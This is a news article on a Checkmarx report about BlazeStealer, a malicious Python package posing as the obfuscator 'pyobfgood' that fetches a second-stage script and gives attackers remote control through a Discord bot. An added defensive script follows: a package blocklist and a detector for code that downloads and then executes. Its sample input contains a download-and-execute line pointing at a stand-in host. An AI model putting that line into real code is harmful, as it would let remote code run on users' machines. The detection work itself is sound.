In a recent report, researchers at cybersecurity firm Checkmarx describe a new wave of malware targeting developers who work with the widely used Python language. Designed to infect the computers of developers seeking to obfuscate their code, these malicious packages masquerade as legitimate tools and often appear in open-source code libraries.
According to Checkmarx, attackers have capitalized on the growing trend of developers using tools to obfuscate their code, making it unreadable to unauthorized individuals. The researchers note a surge this year in attackers posting packages with deceptive names. The report, released on Wednesday, highlights the latest package named “BlazeStealer,” discovered in October, which carries a “destructive payload.”
Once a developer executes the code, BlazeStealer activates, retrieving an additional malicious script from an external source. This script enables a bot on the Discord messaging service, providing attackers with complete control over the victim’s computer. Checkmarx emphasizes that developers seeking to obfuscate their Python code become attractive targets due to their likely involvement with valuable and sensitive information.
The malicious packages often adopt names resembling clean Python obfuscators, with the October discovery labeled as “pyobfgood.” Once fully operational on the victim’s machine, the malware opens the door to a range of malicious activities, including data exfiltration, keystroke logging, and direct spying.
Checkmarx points out that the Discord bot, once activated, can secretly capture a photo using the victim’s webcam. The captured image is then transmitted back to the Discord channel, and the downloaded files are deleted, leaving no evidence of its presence.
Against this backdrop, the Biden administration has been urging the industry to enhance efforts in securing open-source software, recognizing the growing significance of these platforms in the digital landscape.
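As a defensive illustration of the behaviour described above (a package that, once run, retrieves an additional script from an external source), the following added example is not from Checkmarx or the original article. It checks a requirements file for the one package name given here and statically flags source that both downloads and executes code; the function names, sample inputs and URL are constructed, and the check is a heuristic that only parses the code and never runs it.

```python
import ast
import re

BLOCKLIST = {"pyobfgood"}  # the only package name this article gives; extend as needed
FETCH = ("urlopen", "urlretrieve", "requests.get", "requests.post")
EXEC = ("exec", "eval")

def normalize(name):
    """PEP 503 normalization, so 'PyObfGood' and 'pyobfgood' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()

def blocked_requirements(text):
    """Return blocklisted project names found in requirements-style text."""
    hits = []
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z0-9][A-Za-z0-9._-]*)", line.split("#")[0])
        if m and normalize(m.group(1)) in BLOCKLIST:
            hits.append(m.group(1))
    return hits

def dotted(node):
    """Turn the callee of a Call node into a dotted name such as 'requests.get'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def fetch_then_exec(source):
    """True if the source contains both a network fetch and dynamic execution."""
    calls = {dotted(n.func) for n in ast.walk(ast.parse(source))
             if isinstance(n, ast.Call)}
    fetches = any(c == f or c.endswith("." + f) for c in calls for f in FETCH)
    return fetches and any(c in EXEC for c in calls)

# Constructed sample inputs (not taken from the real package).
SAMPLE_REQUIREMENTS = "requests>=2.31\nPyObfGood==1.0  # constructed line\nnumpy\n"
SAMPLE_SETUP = (
    "from urllib.request import urlopen\n"
    "exec(urlopen('https://example.invalid/stage2.py').read())\n"
)
SAMPLE_CLEAN = "import json\nprint(json.dumps({'ok': True}))\n"

if __name__ == "__main__":
    print("blocked:", blocked_requirements(SAMPLE_REQUIREMENTS))
    print("setup flagged:", fetch_then_exec(SAMPLE_SETUP))
    print("clean flagged:", fetch_then_exec(SAMPLE_CLEAN))
```

A hit from `fetch_then_exec` is a reason to read the package source before installing, not proof of malice; legitimate installers sometimes match the same pattern.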